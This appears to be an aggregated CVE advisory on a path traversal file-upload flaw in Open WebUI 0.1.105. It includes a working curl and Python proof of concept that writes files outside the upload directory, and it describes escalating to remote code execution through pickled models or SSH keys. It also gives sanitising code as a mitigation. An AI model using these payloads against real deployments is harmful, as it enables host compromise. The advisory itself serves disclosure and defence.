Open WebUI, Arbitrary File Upload + Path Traversal, KL-CAN-2024-002 (Critical)

How the mentioned CVE works:

The vulnerability exists in Open WebUI version 0.1.105.

The /rag/api/v1/doc API endpoint handles file uploads.

A user attaches a file via the plus sign in the message input box.
The file name is taken directly from the multipart form data.

No validation or sanitization of the filename occurs.

The application constructs the file path by concatenating UPLOAD_DIR with the filename.

An attacker can include path traversal sequences such as ../ in the filename.

This allows writing files outside the intended upload directory.

The vulnerable code snippet shows: file_path = f"{UPLOAD_DIR}/{filename}".

The file contents are then read and written to that path without checks.

Arbitrary file write leads to remote code execution.

Attackers can upload malicious pickled Python models.

Deserialization of pickled data executes arbitrary bytecode.

Alternatively, an attacker can upload an authorized_keys file to enable SSH access.

The web server user's permissions determine which locations are writable.

The PoC uses cURL with a filename parameter containing ../../../../tmp/pwned.txt.

Successful write to /tmp directory confirms traversal.

This is a combination of CWE-22 and CWE-434.

No authentication bypass is needed; any authenticated user can exploit the issue.

The issue affects deployments on Debian GNU/Linux 12.

dailycve form:

Platform: Debian GNU/Linux 12
Version: 0.1.105
Vulnerability: Path Traversal Upload
Severity: Critical
date: 2024.03.12

Prediction: 2024 April 15

What Undercode Say:

Analytics:

PoC curl command:

TARGET_URI='https://victim.com'
JWT='your_jwt_token_here'
curl -H "Authorization: Bearer $JWT" -F "file=@/tmp/evil.txt;filename=../../../../../../../../../../tmp/pwned.txt" "$TARGET_URI/rag/api/v1/doc"

Verify file write:

ollama@webserver:~$ cat /tmp/pwned.txt
korelogic

Python exploit snippet:

import requests
JWT = 'your_jwt_token_here'  # placeholder, same as in the curl example
files = {'file': ('../../../../tmp/backdoor', b'malicious data')}
requests.post('https://victim.com/rag/api/v1/doc', headers={'Authorization': f'Bearer {JWT}'}, files=files)

Exploit:

Authenticate to Open WebUI. Send POST to /rag/api/v1/doc with file parameter containing ../ sequences. File written to filesystem outside uploads directory. Upload SSH authorized_keys or pickled Python model for RCE.

Protection from this CVE:

Sanitize filename by removing path traversal patterns. Use secure file path joining (e.g., os.path.basename). Store files with random names instead of user-supplied names. Run web server with least privilege filesystem permissions.
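
The mitigations above, shown beside the vulnerable path construction quoted earlier. This is an added example, not Open WebUI's own code or its actual patch; the UPLOAD_DIR value, the function names and the extension allow-list are assumptions made for illustration.

```python
import os
import uuid
from pathlib import Path

UPLOAD_DIR = Path("/srv/openwebui/uploads")  # assumed location, not from the advisory


def vulnerable_path(filename: str) -> Path:
    # The pattern quoted on the page: the client-supplied name is concatenated as-is.
    # normpath shows where the operating system would actually write the file.
    return Path(os.path.normpath(f"{UPLOAD_DIR}/{filename}"))


def safe_path(filename: str, upload_dir: Path = UPLOAD_DIR) -> Path:
    """Map a client-supplied filename to a path that stays inside upload_dir."""
    # Treat backslashes as separators too, then keep only the final component.
    name = os.path.basename(filename.replace("\\", "/"))
    if name in ("", ".", "..") or "\x00" in name:
        raise ValueError("invalid upload filename")
    base = upload_dir.resolve()
    candidate = (base / name).resolve()
    # Defence in depth: containment check after resolution (also catches symlinks).
    if base not in candidate.parents:
        raise ValueError("upload path escapes the upload directory")
    return candidate


def random_path(filename: str, upload_dir: Path = UPLOAD_DIR) -> Path:
    """Store under a server-generated name; keep only an allow-listed extension."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in {".txt", ".pdf", ".md"}:  # constructed allow-list
        ext = ".bin"
    return upload_dir.resolve() / f"{uuid.uuid4().hex}{ext}"


if __name__ == "__main__":
    sample = "../../../../tmp/pwned.txt"  # filename value quoted in the advisory text
    print("vulnerable:", vulnerable_path(sample))
    print("basename  :", safe_path(sample))
    print("random    :", random_path(sample))
```

Storing under a server-generated name also removes the ability to choose a meaningful target name such as authorized_keys, which the basename approach alone does not.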

Impact:

Full filesystem write as web server user. Remote code execution via model deserialization. SSH backdoor installation. Complete compromise of the Open WebUI host.

Sources:

Reported By: github.com